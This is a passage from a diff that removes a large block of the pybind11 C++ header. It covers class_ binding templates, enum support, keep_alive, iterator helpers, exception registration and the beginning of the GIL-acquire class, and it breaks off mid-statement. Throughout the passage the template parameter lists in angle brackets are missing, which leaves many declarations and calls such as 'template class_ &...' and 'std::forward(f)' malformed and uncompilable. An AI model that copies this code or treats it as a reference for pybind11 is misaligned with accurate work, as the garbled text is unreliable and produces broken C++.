-        ::operator delete(p, s, std::align_val_t(a));
-        #else
-        ::operator delete(p, std::align_val_t(a));
-        #endif
-        return;
-    }
-    #endif
-    #ifdef __cpp_sized_deallocation
-    ::operator delete(p, s);
-    #else
-    ::operator delete(p);
-    #endif
-}
-
-inline void add_class_method(object& cls, const char *name_, const cpp_function &cf) {
-    cls.attr(cf.name()) = cf;
-    if (strcmp(name_, "__eq__") == 0 && !cls.attr("__dict__").contains("__hash__")) {
-        cls.attr("__hash__") = none();
-    }
-}
-
-PYBIND11_NAMESPACE_END(detail)
-
-/// Given a pointer to a member function, cast it to its `Derived` version.
-/// Forward everything else unchanged.
-template <typename /*Derived*/, typename F>
-auto method_adaptor(F &&f) -> decltype(std::forward<F>(f)) { return std::forward<F>(f); }
-
-template <typename Derived, typename Return, typename Class, typename... Args>
-auto method_adaptor(Return (Class::*pmf)(Args...)) -> Return (Derived::*)(Args...) {
-    static_assert(detail::is_accessible_base_of<Class, Derived>::value,
-        "Cannot bind an inaccessible base class method; use a lambda definition instead");
-    return pmf;
-}
-
-template <typename Derived, typename Return, typename Class, typename... Args>
-auto method_adaptor(Return (Class::*pmf)(Args...) const) -> Return (Derived::*)(Args...) const {
-    static_assert(detail::is_accessible_base_of<Class, Derived>::value,
-        "Cannot bind an inaccessible base class method; use a lambda definition instead");
-    return pmf;
-}
-
-template <typename type_, typename... options>
-class class_ : public detail::generic_type {
-    template <typename T> using is_holder = detail::is_holder_type<type_, T>;
-    template <typename T> using is_subtype = detail::is_strict_base_of<type_, T>;
-    template <typename T> using is_base = detail::is_strict_base_of<T, type_>;
-    // struct instead of using here to help MSVC:
-    template <typename T> struct is_valid_class_option :
-        detail::any_of<is_holder<T>, is_subtype<T>, is_base<T>> {};
-
-public:
-    using type = type_;
-    using type_alias = detail::exactly_one_t<is_subtype, void, options...>;
-    constexpr static bool has_alias = !std::is_void<type_alias>::value;
-    using holder_type = detail::exactly_one_t<is_holder, std::unique_ptr<type>, options...>;
-
-    static_assert(detail::all_of<is_valid_class_option<options>...>::value,
-            "Unknown/invalid class_ template parameters provided");
-
-    static_assert(!has_alias || std::is_polymorphic<type>::value,
-            "Cannot use an alias class with a non-polymorphic type");
-
-    PYBIND11_OBJECT(class_, generic_type, PyType_Check)
-
-    template <typename... Extra>
-    class_(handle scope, const char *name, const Extra &... extra) {
-        using namespace detail;
-
-        // MI can only be specified via class_ template options, not constructor parameters
-        static_assert(
-            none_of<is_pyobject<Extra>...>::value || // no base class arguments, or:
-            (   constexpr_sum(is_pyobject<Extra>::value...) == 1 && // Exactly one base
-                constexpr_sum(is_base<options>::value...)   == 0 && // no template option bases
-                none_of<std::is_same<multiple_inheritance, Extra>...>::value), // no multiple_inheritance attr
-            "Error: multiple inheritance bases must be specified via class_ template options");
-
-        type_record record;
-        record.scope = scope;
-        record.name = name;
-        record.type = &typeid(type);
-        record.type_size = sizeof(conditional_t<has_alias, type_alias, type>);
-        record.type_align = alignof(conditional_t<has_alias, type_alias, type>&);
-        record.holder_size = sizeof(holder_type);
-        record.init_instance = init_instance;
-        record.dealloc = dealloc;
-        record.default_holder = detail::is_instantiation<std::unique_ptr, holder_type>::value;
-
-        set_operator_new<type>(&record);
-
-        /* Register base classes specified via template arguments to class_, if any */
-        PYBIND11_EXPAND_SIDE_EFFECTS(add_base<options>(record));
-
-        /* Process optional arguments, if any */
-        process_attributes<Extra...>::init(extra..., &record);
-
-        generic_type::initialize(record);
-
-        if (has_alias) {
-            auto &instances = record.module_local ? registered_local_types_cpp() : get_internals().registered_types_cpp;
-            instances[std::type_index(typeid(type_alias))] = instances[std::type_index(typeid(type))];
-        }
-    }
-
-    template <typename Base, detail::enable_if_t<is_base<Base>::value, int> = 0>
-    static void add_base(detail::type_record &rec) {
-        rec.add_base(typeid(Base), [](void *src) -> void * {
-            return static_cast<Base *>(reinterpret_cast<type *>(src));
-        });
-    }
-
-    template <typename Base, detail::enable_if_t<!is_base<Base>::value, int> = 0>
-    static void add_base(detail::type_record &) { }
-
-    template <typename Func, typename... Extra>
-    class_ &def(const char *name_, Func&& f, const Extra&... extra) {
-        cpp_function cf(method_adaptor<type>(std::forward<Func>(f)), name(name_), is_method(*this),
-                        sibling(getattr(*this, name_, none())), extra...);
-        add_class_method(*this, name_, cf);
-        return *this;
-    }
-
-    template <typename Func, typename... Extra> class_ &
-    def_static(const char *name_, Func &&f, const Extra&... extra) {
-        static_assert(!std::is_member_function_pointer<Func>::value,
-                "def_static(...) called with a non-static member function pointer");
-        cpp_function cf(std::forward<Func>(f), name(name_), scope(*this),
-                        sibling(getattr(*this, name_, none())), extra...);
-        attr(cf.name()) = staticmethod(cf);
-        return *this;
-    }
-
-    template <detail::op_id id, detail::op_type ot, typename L, typename R, typename... Extra>
-    class_ &def(const detail::op_<id, ot, L, R> &op, const Extra&... extra) {
-        op.execute(*this, extra...);
-        return *this;
-    }
-
-    template <detail::op_id id, detail::op_type ot, typename L, typename R, typename... Extra>
-    class_ & def_cast(const detail::op_<id, ot, L, R> &op, const Extra&... extra) {
-        op.execute_cast(*this, extra...);
-        return *this;
-    }
-
-    template <typename... Args, typename... Extra>
-    class_ &def(const detail::initimpl::constructor<Args...> &init, const Extra&... extra) {
-        init.execute(*this, extra...);
-        return *this;
-    }
-
-    template <typename... Args, typename... Extra>
-    class_ &def(const detail::initimpl::alias_constructor<Args...> &init, const Extra&... extra) {
-        init.execute(*this, extra...);
-        return *this;
-    }
-
-    template <typename... Args, typename... Extra>
-    class_ &def(detail::initimpl::factory<Args...> &&init, const Extra&... extra) {
-        std::move(init).execute(*this, extra...);
-        return *this;
-    }
-
-    template <typename... Args, typename... Extra>
-    class_ &def(detail::initimpl::pickle_factory<Args...> &&pf, const Extra &...extra) {
-        std::move(pf).execute(*this, extra...);
-        return *this;
-    }
-
-    template <typename Func> class_& def_buffer(Func &&func) {
-        struct capture { Func func; };
-        capture *ptr = new capture { std::forward<Func>(func) };
-        install_buffer_funcs([](PyObject *obj, void *ptr) -> buffer_info* {
-            detail::make_caster<type> caster;
-            if (!caster.load(obj, false))
-                return nullptr;
-            return new buffer_info(((capture *) ptr)->func(caster));
-        }, ptr);
-        return *this;
-    }
-
-    template <typename Return, typename Class, typename... Args>
-    class_ &def_buffer(Return (Class::*func)(Args...)) {
-        return def_buffer([func] (type &obj) { return (obj.*func)(); });
-    }
-
-    template <typename Return, typename Class, typename... Args>
-    class_ &def_buffer(Return (Class::*func)(Args...) const) {
-        return def_buffer([func] (const type &obj) { return (obj.*func)(); });
-    }
-
-    template <typename C, typename D, typename... Extra>
-    class_ &def_readwrite(const char *name, D C::*pm, const Extra&... extra) {
-        static_assert(std::is_same<C, type>::value || std::is_base_of<C, type>::value, "def_readwrite() requires a class member (or base class member)");
-        cpp_function fget([pm](const type &c) -> const D &{ return c.*pm; }, is_method(*this)),
-                     fset([pm](type &c, const D &value) { c.*pm = value; }, is_method(*this));
-        def_property(name, fget, fset, return_value_policy::reference_internal, extra...);
-        return *this;
-    }
-
-    template <typename C, typename D, typename... Extra>
-    class_ &def_readonly(const char *name, const D C::*pm, const Extra& ...extra) {
-        static_assert(std::is_same<C, type>::value || std::is_base_of<C, type>::value, "def_readonly() requires a class member (or base class member)");
-        cpp_function fget([pm](const type &c) -> const D &{ return c.*pm; }, is_method(*this));
-        def_property_readonly(name, fget, return_value_policy::reference_internal, extra...);
-        return *this;
-    }
-
-    template <typename D, typename... Extra>
-    class_ &def_readwrite_static(const char *name, D *pm, const Extra& ...extra) {
-        cpp_function fget([pm](object) -> const D &{ return *pm; }, scope(*this)),
-                     fset([pm](object, const D &value) { *pm = value; }, scope(*this));
-        def_property_static(name, fget, fset, return_value_policy::reference, extra...);
-        return *this;
-    }
-
-    template <typename D, typename... Extra>
-    class_ &def_readonly_static(const char *name, const D *pm, const Extra& ...extra) {
-        cpp_function fget([pm](object) -> const D &{ return *pm; }, scope(*this));
-        def_property_readonly_static(name, fget, return_value_policy::reference, extra...);
-        return *this;
-    }
-
-    /// Uses return_value_policy::reference_internal by default
-    template <typename Getter, typename... Extra>
-    class_ &def_property_readonly(const char *name, const Getter &fget, const Extra& ...extra) {
-        return def_property_readonly(name, cpp_function(method_adaptor<type>(fget)),
-                                     return_value_policy::reference_internal, extra...);
-    }
-
-    /// Uses cpp_function's return_value_policy by default
-    template <typename... Extra>
-    class_ &def_property_readonly(const char *name, const cpp_function &fget, const Extra& ...extra) {
-        return def_property(name, fget, nullptr, extra...);
-    }
-
-    /// Uses
return_value_policy::reference by default - template - class_ &def_property_readonly_static(const char *name, const Getter &fget, const Extra& ...extra) { - return def_property_readonly_static(name, cpp_function(fget), return_value_policy::reference, extra...); - } - - /// Uses cpp_function's return_value_policy by default - template - class_ &def_property_readonly_static(const char *name, const cpp_function &fget, const Extra& ...extra) { - return def_property_static(name, fget, nullptr, extra...); - } - - /// Uses return_value_policy::reference_internal by default - template - class_ &def_property(const char *name, const Getter &fget, const Setter &fset, const Extra& ...extra) { - return def_property(name, fget, cpp_function(method_adaptor(fset)), extra...); - } - template - class_ &def_property(const char *name, const Getter &fget, const cpp_function &fset, const Extra& ...extra) { - return def_property(name, cpp_function(method_adaptor(fget)), fset, - return_value_policy::reference_internal, extra...); - } - - /// Uses cpp_function's return_value_policy by default - template - class_ &def_property(const char *name, const cpp_function &fget, const cpp_function &fset, const Extra& ...extra) { - return def_property_static(name, fget, fset, is_method(*this), extra...); - } - - /// Uses return_value_policy::reference by default - template - class_ &def_property_static(const char *name, const Getter &fget, const cpp_function &fset, const Extra& ...extra) { - return def_property_static(name, cpp_function(fget), fset, return_value_policy::reference, extra...); - } - - /// Uses cpp_function's return_value_policy by default - template - class_ &def_property_static(const char *name, const cpp_function &fget, const cpp_function &fset, const Extra& ...extra) { - static_assert( 0 == detail::constexpr_sum(std::is_base_of::value...), - "Argument annotations are not allowed for properties"); - auto rec_fget = get_function_record(fget), rec_fset = get_function_record(fset); - 
auto *rec_active = rec_fget; - if (rec_fget) { - char *doc_prev = rec_fget->doc; /* 'extra' field may include a property-specific documentation string */ - detail::process_attributes::init(extra..., rec_fget); - if (rec_fget->doc && rec_fget->doc != doc_prev) { - free(doc_prev); - rec_fget->doc = strdup(rec_fget->doc); - } - } - if (rec_fset) { - char *doc_prev = rec_fset->doc; - detail::process_attributes::init(extra..., rec_fset); - if (rec_fset->doc && rec_fset->doc != doc_prev) { - free(doc_prev); - rec_fset->doc = strdup(rec_fset->doc); - } - if (! rec_active) rec_active = rec_fset; - } - def_property_static_impl(name, fget, fset, rec_active); - return *this; - } - -private: - /// Initialize holder object, variant 1: object derives from enable_shared_from_this - template - static void init_holder(detail::instance *inst, detail::value_and_holder &v_h, - const holder_type * /* unused */, const std::enable_shared_from_this * /* dummy */) { - try { - auto sh = std::dynamic_pointer_cast( - v_h.value_ptr()->shared_from_this()); - if (sh) { - new (std::addressof(v_h.holder())) holder_type(std::move(sh)); - v_h.set_holder_constructed(); - } - } catch (const std::bad_weak_ptr &) {} - - if (!v_h.holder_constructed() && inst->owned) { - new (std::addressof(v_h.holder())) holder_type(v_h.value_ptr()); - v_h.set_holder_constructed(); - } - } - - static void init_holder_from_existing(const detail::value_and_holder &v_h, - const holder_type *holder_ptr, std::true_type /*is_copy_constructible*/) { - new (std::addressof(v_h.holder())) holder_type(*reinterpret_cast(holder_ptr)); - } - - static void init_holder_from_existing(const detail::value_and_holder &v_h, - const holder_type *holder_ptr, std::false_type /*is_copy_constructible*/) { - new (std::addressof(v_h.holder())) holder_type(std::move(*const_cast(holder_ptr))); - } - - /// Initialize holder object, variant 2: try to construct from existing holder object, if possible - static void init_holder(detail::instance *inst, 
detail::value_and_holder &v_h, - const holder_type *holder_ptr, const void * /* dummy -- not enable_shared_from_this) */) { - if (holder_ptr) { - init_holder_from_existing(v_h, holder_ptr, std::is_copy_constructible()); - v_h.set_holder_constructed(); - } else if (inst->owned || detail::always_construct_holder::value) { - new (std::addressof(v_h.holder())) holder_type(v_h.value_ptr()); - v_h.set_holder_constructed(); - } - } - - /// Performs instance initialization including constructing a holder and registering the known - /// instance. Should be called as soon as the `type` value_ptr is set for an instance. Takes an - /// optional pointer to an existing holder to use; if not specified and the instance is - /// `.owned`, a new holder will be constructed to manage the value pointer. - static void init_instance(detail::instance *inst, const void *holder_ptr) { - auto v_h = inst->get_value_and_holder(detail::get_type_info(typeid(type))); - if (!v_h.instance_registered()) { - register_instance(inst, v_h.value_ptr(), v_h.type); - v_h.set_instance_registered(); - } - init_holder(inst, v_h, (const holder_type *) holder_ptr, v_h.value_ptr()); - } - - /// Deallocates an instance; via holder, if constructed; otherwise via operator delete. - static void dealloc(detail::value_and_holder &v_h) { - // We could be deallocating because we are cleaning up after a Python exception. - // If so, the Python error indicator will be set. We need to clear that before - // running the destructor, in case the destructor code calls more Python. - // If we don't, the Python API will exit with an exception, and pybind11 will - // throw error_already_set from the C++ destructor which is forbidden and triggers - // std::terminate(). 
- error_scope scope; - if (v_h.holder_constructed()) { - v_h.holder().~holder_type(); - v_h.set_holder_constructed(false); - } - else { - detail::call_operator_delete(v_h.value_ptr(), - v_h.type->type_size, - v_h.type->type_align - ); - } - v_h.value_ptr() = nullptr; - } - - static detail::function_record *get_function_record(handle h) { - h = detail::get_function(h); - return h ? (detail::function_record *) reinterpret_borrow(PyCFunction_GET_SELF(h.ptr())) - : nullptr; - } -}; - -/// Binds an existing constructor taking arguments Args... -template detail::initimpl::constructor init() { return {}; } -/// Like `init()`, but the instance is always constructed through the alias class (even -/// when not inheriting on the Python side). -template detail::initimpl::alias_constructor init_alias() { return {}; } - -/// Binds a factory function as a constructor -template > -Ret init(Func &&f) { return {std::forward(f)}; } - -/// Dual-argument factory function: the first function is called when no alias is needed, the second -/// when an alias is needed (i.e. due to python-side inheritance). Arguments must be identical. -template > -Ret init(CFunc &&c, AFunc &&a) { - return {std::forward(c), std::forward(a)}; -} - -/// Binds pickling functions `__getstate__` and `__setstate__` and ensures that the type -/// returned by `__getstate__` is the same as the argument accepted by `__setstate__`. 
-template -detail::initimpl::pickle_factory pickle(GetState &&g, SetState &&s) { - return {std::forward(g), std::forward(s)}; -} - -PYBIND11_NAMESPACE_BEGIN(detail) -struct enum_base { - enum_base(handle base, handle parent) : m_base(base), m_parent(parent) { } - - PYBIND11_NOINLINE void init(bool is_arithmetic, bool is_convertible) { - m_base.attr("__entries") = dict(); - auto property = handle((PyObject *) &PyProperty_Type); - auto static_property = handle((PyObject *) get_internals().static_property_type); - - m_base.attr("__repr__") = cpp_function( - [](handle arg) -> str { - handle type = arg.get_type(); - object type_name = type.attr("__name__"); - dict entries = type.attr("__entries"); - for (const auto &kv : entries) { - object other = kv.second[int_(0)]; - if (other.equal(arg)) - return pybind11::str("{}.{}").format(type_name, kv.first); - } - return pybind11::str("{}.???").format(type_name); - }, name("__repr__"), is_method(m_base) - ); - - m_base.attr("name") = property(cpp_function( - [](handle arg) -> str { - dict entries = arg.get_type().attr("__entries"); - for (const auto &kv : entries) { - if (handle(kv.second[int_(0)]).equal(arg)) - return pybind11::str(kv.first); - } - return "???"; - }, name("name"), is_method(m_base) - )); - - m_base.attr("__doc__") = static_property(cpp_function( - [](handle arg) -> std::string { - std::string docstring; - dict entries = arg.attr("__entries"); - if (((PyTypeObject *) arg.ptr())->tp_doc) - docstring += std::string(((PyTypeObject *) arg.ptr())->tp_doc) + "\n\n"; - docstring += "Members:"; - for (const auto &kv : entries) { - auto key = std::string(pybind11::str(kv.first)); - auto comment = kv.second[int_(1)]; - docstring += "\n\n " + key; - if (!comment.is_none()) - docstring += " : " + (std::string) pybind11::str(comment); - } - return docstring; - }, name("__doc__") - ), none(), none(), ""); - - m_base.attr("__members__") = static_property(cpp_function( - [](handle arg) -> dict { - dict entries = 
arg.attr("__entries"), m; - for (const auto &kv : entries) - m[kv.first] = kv.second[int_(0)]; - return m; - }, name("__members__")), none(), none(), "" - ); - - #define PYBIND11_ENUM_OP_STRICT(op, expr, strict_behavior) \ - m_base.attr(op) = cpp_function( \ - [](object a, object b) { \ - if (!a.get_type().is(b.get_type())) \ - strict_behavior; \ - return expr; \ - }, \ - name(op), is_method(m_base)) - - #define PYBIND11_ENUM_OP_CONV(op, expr) \ - m_base.attr(op) = cpp_function( \ - [](object a_, object b_) { \ - int_ a(a_), b(b_); \ - return expr; \ - }, \ - name(op), is_method(m_base)) - - #define PYBIND11_ENUM_OP_CONV_LHS(op, expr) \ - m_base.attr(op) = cpp_function( \ - [](object a_, object b) { \ - int_ a(a_); \ - return expr; \ - }, \ - name(op), is_method(m_base)) - - if (is_convertible) { - PYBIND11_ENUM_OP_CONV_LHS("__eq__", !b.is_none() && a.equal(b)); - PYBIND11_ENUM_OP_CONV_LHS("__ne__", b.is_none() || !a.equal(b)); - - if (is_arithmetic) { - PYBIND11_ENUM_OP_CONV("__lt__", a < b); - PYBIND11_ENUM_OP_CONV("__gt__", a > b); - PYBIND11_ENUM_OP_CONV("__le__", a <= b); - PYBIND11_ENUM_OP_CONV("__ge__", a >= b); - PYBIND11_ENUM_OP_CONV("__and__", a & b); - PYBIND11_ENUM_OP_CONV("__rand__", a & b); - PYBIND11_ENUM_OP_CONV("__or__", a | b); - PYBIND11_ENUM_OP_CONV("__ror__", a | b); - PYBIND11_ENUM_OP_CONV("__xor__", a ^ b); - PYBIND11_ENUM_OP_CONV("__rxor__", a ^ b); - m_base.attr("__invert__") = cpp_function( - [](object arg) { return ~(int_(arg)); }, name("__invert__"), is_method(m_base)); - } - } else { - PYBIND11_ENUM_OP_STRICT("__eq__", int_(a).equal(int_(b)), return false); - PYBIND11_ENUM_OP_STRICT("__ne__", !int_(a).equal(int_(b)), return true); - - if (is_arithmetic) { - #define PYBIND11_THROW throw type_error("Expected an enumeration of matching type!"); - PYBIND11_ENUM_OP_STRICT("__lt__", int_(a) < int_(b), PYBIND11_THROW); - PYBIND11_ENUM_OP_STRICT("__gt__", int_(a) > int_(b), PYBIND11_THROW); - PYBIND11_ENUM_OP_STRICT("__le__", int_(a) <= 
int_(b), PYBIND11_THROW); - PYBIND11_ENUM_OP_STRICT("__ge__", int_(a) >= int_(b), PYBIND11_THROW); - #undef PYBIND11_THROW - } - } - - #undef PYBIND11_ENUM_OP_CONV_LHS - #undef PYBIND11_ENUM_OP_CONV - #undef PYBIND11_ENUM_OP_STRICT - - m_base.attr("__getstate__") = cpp_function( - [](object arg) { return int_(arg); }, name("__getstate__"), is_method(m_base)); - - m_base.attr("__hash__") = cpp_function( - [](object arg) { return int_(arg); }, name("__hash__"), is_method(m_base)); - } - - PYBIND11_NOINLINE void value(char const* name_, object value, const char *doc = nullptr) { - dict entries = m_base.attr("__entries"); - str name(name_); - if (entries.contains(name)) { - std::string type_name = (std::string) str(m_base.attr("__name__")); - throw value_error(type_name + ": element \"" + std::string(name_) + "\" already exists!"); - } - - entries[name] = std::make_pair(value, doc); - m_base.attr(name) = value; - } - - PYBIND11_NOINLINE void export_values() { - dict entries = m_base.attr("__entries"); - for (const auto &kv : entries) - m_parent.attr(kv.first) = kv.second[int_(0)]; - } - - handle m_base; - handle m_parent; -}; - -PYBIND11_NAMESPACE_END(detail) - -/// Binds C++ enumerations and enumeration classes to Python -template class enum_ : public class_ { -public: - using Base = class_; - using Base::def; - using Base::attr; - using Base::def_property_readonly; - using Base::def_property_readonly_static; - using Scalar = typename std::underlying_type::type; - - template - enum_(const handle &scope, const char *name, const Extra&... 
extra) - : class_(scope, name, extra...), m_base(*this, scope) { - constexpr bool is_arithmetic = detail::any_of...>::value; - constexpr bool is_convertible = std::is_convertible::value; - m_base.init(is_arithmetic, is_convertible); - - def(init([](Scalar i) { return static_cast(i); })); - def("__int__", [](Type value) { return (Scalar) value; }); - #if PY_MAJOR_VERSION < 3 - def("__long__", [](Type value) { return (Scalar) value; }); - #endif - #if PY_MAJOR_VERSION > 3 || (PY_MAJOR_VERSION == 3 && PY_MINOR_VERSION >= 8) - def("__index__", [](Type value) { return (Scalar) value; }); - #endif - - attr("__setstate__") = cpp_function( - [](detail::value_and_holder &v_h, Scalar arg) { - detail::initimpl::setstate(v_h, static_cast(arg), - Py_TYPE(v_h.inst) != v_h.type->type); }, - detail::is_new_style_constructor(), - pybind11::name("__setstate__"), is_method(*this)); - } - - /// Export enumeration entries into the parent scope - enum_& export_values() { - m_base.export_values(); - return *this; - } - - /// Add an enumeration entry - enum_& value(char const* name, Type value, const char *doc = nullptr) { - m_base.value(name, pybind11::cast(value, return_value_policy::copy), doc); - return *this; - } - -private: - detail::enum_base m_base; -}; - -PYBIND11_NAMESPACE_BEGIN(detail) - - -inline void keep_alive_impl(handle nurse, handle patient) { - if (!nurse || !patient) - pybind11_fail("Could not activate keep_alive!"); - - if (patient.is_none() || nurse.is_none()) - return; /* Nothing to keep alive or nothing to be kept alive by */ - - auto tinfo = all_type_info(Py_TYPE(nurse.ptr())); - if (!tinfo.empty()) { - /* It's a pybind-registered type, so we can store the patient in the - * internal list. */ - add_patient(nurse.ptr(), patient.ptr()); - } - else { - /* Fall back to clever approach based on weak references taken from - * Boost.Python. This is not used for pybind-registered types because - * the objects can be destroyed out-of-order in a GC pass. 
*/ - cpp_function disable_lifesupport( - [patient](handle weakref) { patient.dec_ref(); weakref.dec_ref(); }); - - weakref wr(nurse, disable_lifesupport); - - patient.inc_ref(); /* reference patient and leak the weak reference */ - (void) wr.release(); - } -} - -PYBIND11_NOINLINE inline void keep_alive_impl(size_t Nurse, size_t Patient, function_call &call, handle ret) { - auto get_arg = [&](size_t n) { - if (n == 0) - return ret; - else if (n == 1 && call.init_self) - return call.init_self; - else if (n <= call.args.size()) - return call.args[n - 1]; - return handle(); - }; - - keep_alive_impl(get_arg(Nurse), get_arg(Patient)); -} - -inline std::pair all_type_info_get_cache(PyTypeObject *type) { - auto res = get_internals().registered_types_py -#ifdef __cpp_lib_unordered_map_try_emplace - .try_emplace(type); -#else - .emplace(type, std::vector()); -#endif - if (res.second) { - // New cache entry created; set up a weak reference to automatically remove it if the type - // gets destroyed: - weakref((PyObject *) type, cpp_function([type](handle wr) { - get_internals().registered_types_py.erase(type); - wr.dec_ref(); - })).release(); - } - - return res; -} - -template -struct iterator_state { - Iterator it; - Sentinel end; - bool first_or_done; -}; - -PYBIND11_NAMESPACE_END(detail) - -/// Makes a python iterator from a first and past-the-end C++ InputIterator. -template ()), - typename... Extra> -iterator make_iterator(Iterator first, Sentinel last, Extra &&... 
extra) { - typedef detail::iterator_state state; - - if (!detail::get_type_info(typeid(state), false)) { - class_(handle(), "iterator", pybind11::module_local()) - .def("__iter__", [](state &s) -> state& { return s; }) - .def("__next__", [](state &s) -> ValueType { - if (!s.first_or_done) - ++s.it; - else - s.first_or_done = false; - if (s.it == s.end) { - s.first_or_done = true; - throw stop_iteration(); - } - return *s.it; - }, std::forward(extra)..., Policy); - } - - return cast(state{first, last, true}); -} - -/// Makes an python iterator over the keys (`.first`) of a iterator over pairs from a -/// first and past-the-end InputIterator. -template ()).first), - typename... Extra> -iterator make_key_iterator(Iterator first, Sentinel last, Extra &&... extra) { - typedef detail::iterator_state state; - - if (!detail::get_type_info(typeid(state), false)) { - class_(handle(), "iterator", pybind11::module_local()) - .def("__iter__", [](state &s) -> state& { return s; }) - .def("__next__", [](state &s) -> KeyType { - if (!s.first_or_done) - ++s.it; - else - s.first_or_done = false; - if (s.it == s.end) { - s.first_or_done = true; - throw stop_iteration(); - } - return (*s.it).first; - }, std::forward(extra)..., Policy); - } - - return cast(state{first, last, true}); -} - -/// Makes an iterator over values of an stl container or other container supporting -/// `std::begin()`/`std::end()` -template iterator make_iterator(Type &value, Extra&&... extra) { - return make_iterator(std::begin(value), std::end(value), extra...); -} - -/// Makes an iterator over the keys (`.first`) of a stl map-like container supporting -/// `std::begin()`/`std::end()` -template iterator make_key_iterator(Type &value, Extra&&... 
extra) { - return make_key_iterator(std::begin(value), std::end(value), extra...); -} - -template void implicitly_convertible() { - struct set_flag { - bool &flag; - set_flag(bool &flag) : flag(flag) { flag = true; } - ~set_flag() { flag = false; } - }; - auto implicit_caster = [](PyObject *obj, PyTypeObject *type) -> PyObject * { - static bool currently_used = false; - if (currently_used) // implicit conversions are non-reentrant - return nullptr; - set_flag flag_helper(currently_used); - if (!detail::make_caster().load(obj, false)) - return nullptr; - tuple args(1); - args[0] = obj; - PyObject *result = PyObject_Call((PyObject *) type, args.ptr(), nullptr); - if (result == nullptr) - PyErr_Clear(); - return result; - }; - - if (auto tinfo = detail::get_type_info(typeid(OutputType))) - tinfo->implicit_conversions.push_back(implicit_caster); - else - pybind11_fail("implicitly_convertible: Unable to find type " + type_id()); -} - -template -void register_exception_translator(ExceptionTranslator&& translator) { - detail::get_internals().registered_exception_translators.push_front( - std::forward(translator)); -} - -/** - * Wrapper to generate a new Python exception type. - * - * This should only be used with PyErr_SetString for now. - * It is not (yet) possible to use as a py::base. - * Template type argument is reserved for future use. 
- */ -template -class exception : public object { -public: - exception() = default; - exception(handle scope, const char *name, PyObject *base = PyExc_Exception) { - std::string full_name = scope.attr("__name__").cast() + - std::string(".") + name; - m_ptr = PyErr_NewException(const_cast(full_name.c_str()), base, NULL); - if (hasattr(scope, name)) - pybind11_fail("Error during initialization: multiple incompatible " - "definitions with name \"" + std::string(name) + "\""); - scope.attr(name) = *this; - } - - // Sets the current python exception to this exception object with the given message - void operator()(const char *message) { - PyErr_SetString(m_ptr, message); - } -}; - -PYBIND11_NAMESPACE_BEGIN(detail) -// Returns a reference to a function-local static exception object used in the simple -// register_exception approach below. (It would be simpler to have the static local variable -// directly in register_exception, but that makes clang <3.5 segfault - issue #1349). -template -exception &get_exception_object() { static exception ex; return ex; } -PYBIND11_NAMESPACE_END(detail) - -/** - * Registers a Python exception in `m` of the given `name` and installs an exception translator to - * translate the C++ exception to the created Python exception using the exceptions what() method. - * This is intended for simple exception translations; for more complex translation, register the - * exception object and translator directly. 
- */ -template -exception ®ister_exception(handle scope, - const char *name, - PyObject *base = PyExc_Exception) { - auto &ex = detail::get_exception_object(); - if (!ex) ex = exception(scope, name, base); - - register_exception_translator([](std::exception_ptr p) { - if (!p) return; - try { - std::rethrow_exception(p); - } catch (const CppException &e) { - detail::get_exception_object()(e.what()); - } - }); - return ex; -} - -PYBIND11_NAMESPACE_BEGIN(detail) -PYBIND11_NOINLINE inline void print(tuple args, dict kwargs) { - auto strings = tuple(args.size()); - for (size_t i = 0; i < args.size(); ++i) { - strings[i] = str(args[i]); - } - auto sep = kwargs.contains("sep") ? kwargs["sep"] : cast(" "); - auto line = sep.attr("join")(strings); - - object file; - if (kwargs.contains("file")) { - file = kwargs["file"].cast(); - } else { - try { - file = module::import("sys").attr("stdout"); - } catch (const error_already_set &) { - /* If print() is called from code that is executed as - part of garbage collection during interpreter shutdown, - importing 'sys' can fail. Give up rather than crashing the - interpreter in this case. */ - return; - } - } - - auto write = file.attr("write"); - write(line); - write(kwargs.contains("end") ? kwargs["end"] : cast("\n")); - - if (kwargs.contains("flush") && kwargs["flush"].cast()) - file.attr("flush")(); -} -PYBIND11_NAMESPACE_END(detail) - -template -void print(Args &&...args) { - auto c = detail::collect_arguments(std::forward(args)...); - detail::print(c.args(), c.kwargs()); -} - -#if defined(WITH_THREAD) && !defined(PYPY_VERSION) - -/* The functions below essentially reproduce the PyGILState_* API using a RAII - * pattern, but there are a few important differences: - * - * 1. When acquiring the GIL from an non-main thread during the finalization - * phase, the GILState API blindly terminates the calling thread, which - * is often not what is wanted. This API does not do this. - * - * 2. 
The gil_scoped_release function can optionally cut the relationship - * of a PyThreadState and its associated thread, which allows moving it to - * another thread (this is a fairly rare/advanced use case). - * - * 3. The reference count of an acquired thread state can be controlled. This - * can be handy to prevent cases where callbacks issued from an external - * thread would otherwise constantly construct and destroy thread state data - * structures. - * - * See the Python bindings of NanoGUI (http://github.com/wjakob/nanogui) for an - * example which uses features 2 and 3 to migrate the Python thread of - * execution to another thread (to run the event loop on the original thread, - * in this case). - */ - -class gil_scoped_acquire { -public: - PYBIND11_NOINLINE gil_scoped_acquire() { - auto const &internals = detail::get_internals(); - tstate = (PyThreadState *) PYBIND11_TLS_GET_VALUE(internals.tstate); - - if (!tstate) { - /* Check if the GIL was acquired using the PyGILState_* API instead (e.g. if - calling from a Python thread). Since we use a different key, this ensures - we don't create a new thread state and deadlock in PyEval_AcquireThread - below. Note we don't save this state with internals.tstate, since we don't - create it we would fail to clear it (its reference count should be > 0). 
*/ - tstate = PyGILState_GetThisThreadState(); - } - - if (!tstate) { - tstate = PyThreadState_New(internals.istate); - #if !defined(NDEBUG) - if (!tstate) - pybind11_fail("scoped_acquire: could not create thread state!"); - #endif - tstate->gilstate_counter = 0; - PYBIND11_TLS_REPLACE_VALUE(internals.tstate, tstate); - } else { - release = detail::get_thread_state_unchecked() != tstate; - } - - if (release) { - /* Work around an annoying assertion in PyThreadState_Swap */ - #if defined(Py_DEBUG) - PyInterpreterState *interp = tstate->interp; - tstate->interp = nullptr; - #endif - PyEval_AcquireThread(tstate); - #if defined(Py_DEBUG) - tstate->interp = interp; - #endif - } - - inc_ref(); - } - - void inc_ref() { - ++tstate->gilstate_counter; - } - - PYBIND11_NOINLINE void dec_ref() { - --tstate->gilstate_counter; - #if !defined(NDEBUG) - if (detail::get_thread_state_unchecked() != tstate) - pybind11_fail("scoped_acquire::dec_ref(): thread state must be current!"); - if (tstate->gilstate_counter < 0) - pybind11_fail("scoped_acquire::dec_ref(): reference count underflow!"); - #endif - if (tstate->gilstate_counter == 0) { - #if !defined(NDEBUG) - if (!release) - pybind11_fail("scoped_acquire::dec_ref(): internal error!"); - #endif - PyThreadState_Clear(tstate); - PyThreadState_DeleteCurrent(); - PYBIND11_TLS_DELETE_VALUE(detail::get_internals().tstate); - release = 